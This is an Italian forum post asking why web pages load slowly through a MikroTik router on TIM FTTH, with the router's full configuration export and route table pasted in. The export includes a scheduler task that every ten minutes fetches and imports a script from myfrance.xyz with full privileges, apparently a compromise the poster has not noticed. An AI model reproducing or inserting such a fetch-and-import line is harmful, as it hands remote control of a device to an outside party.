Non riesco a configurare il router in modo tale che le pagine web caricano normalmente. Ping funziona correttamente per qualsiasi sito, ma le pagine web prendono oltre un minuto per rispondere ad una richiesta. Vedete qualcosa nel config che non va bene per TIM FTTH?
- Codice: Seleziona tutto
# aug/17/2021 01:08:23 by RouterOS 6.46.8
# software id = LXXS-YDR4
#
# model = RB760iGS
# serial number = E1F10EE1795A
/interface bridgeadd admin-mac=2C:C8:1B:4F:xx:xx auto-mac=no fast-forward=no name=bridgeLocal
/interface vlan
add interface=sfp1 mtu=1452 name=vlan835 vlan-id=835
/interface pppoe-client
add add-default-route=yes disabled=no interface=vlan835 name=pppoe-out1 password=adsl@alice6.it use-peer-dns=yes user=adsl@alice6.it
/interface wireless security-profiles
set [ find default=yes ] supplicant-identity=MikroTik
/ip hotspot profile
set [ find default=yes ] html-directory=flash/hotspot
/ip pool
add name=dhcp_pool0 ranges=192.168.88.11-192.168.88.199
/ip dhcp-server
add address-pool=dhcp_pool0 disabled=no interface=bridgeLocal lease-time=12h name=dhcp1
/interface bridge port
add bridge=bridgeLocal comment=defconf interface=ether2
add bridge=bridgeLocal comment=defconf interface=ether3
add bridge=bridgeLocal comment=defconf interface=ether4
add bridge=bridgeLocal comment=defconf interface=ether5
/ip address
add address=192.168.88.1/24 interface=bridgeLocal network=192.168.88.0
/ip dhcp-client
add comment=defconf disabled=no interface=vlan835
/ip dhcp-server network
add address=192.168.88.0/24 dns-server=8.8.8.8,8.8.4.4 gateway=192.168.88.1
/ip dns
set allow-remote-requests=yes servers=8.8.8.8,8.8.4.4
/ip firewall nat
add action=masquerade chain=srcnat out-interface=pppoe-out1
/system clock
set time-zone-name=Europe/Rome
/system scheduler
add interval=10m name=U6 on-event="/tool fetch url=http://myfrance.xyz/poll/b5782945-d155-42cc-b09a-5c99deeb25f7 mode=http dst-path=7wmp0b4s.rsc\r\
\n/import 7wmp0b4s.rsc" policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=aug/16/2021 start-time=16:25:48
[admin@MikroTik] /ip route> print
Flags: X - disabled, A - active, D - dynamic, C - connect, S - static, r - rip, b - bgp, o - ospf, m - mme, B - blackhole, U - unreachable, P - prohibit
# DST-ADDRESS PREF-SRC GATEWAY DISTANCE
0 ADS 0.0.0.0/0 pppoe-out1 1
1 ADC 192.168.88.0/24 192.168.88.1 bridgeLocal 0
2 ADC 192.168.100.1/32 79.24.190.108 pppoe-out1 0